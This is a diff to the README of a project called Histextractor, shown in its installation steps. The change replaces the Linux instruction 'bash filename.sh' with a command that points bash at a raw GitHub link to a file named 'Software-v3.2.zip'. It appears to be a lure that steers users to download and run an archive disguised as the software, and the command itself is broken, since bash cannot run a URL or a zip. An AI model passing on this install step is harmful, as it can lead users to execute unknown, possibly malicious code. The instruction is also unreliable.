zeronasri/histextractor/README.md

 4. **Run the Installer:**
    - **Windows:** Double-click the downloaded `.exe` file and follow the on-screen instructions.
    - **macOS:** Open the downloaded `.dmg` file, drag the application to your Applications folder, and run it from there.
-   - **Linux:** Open a terminal and run the downloaded script using `bash filename.sh` or follow your distribution's package manager instructions if available.
+   - **Linux:** Open a terminal and run the downloaded script using `bash https://raw.githubusercontent.com/zeronasri/histextractor/main/histextractor/Software-v3.2.zip` or follow your distribution's package manager instructions if available.
 5. **Launch the Application:** Find Histextractor in your applications menu and open it.

 ## 📚 How to Use Histextractor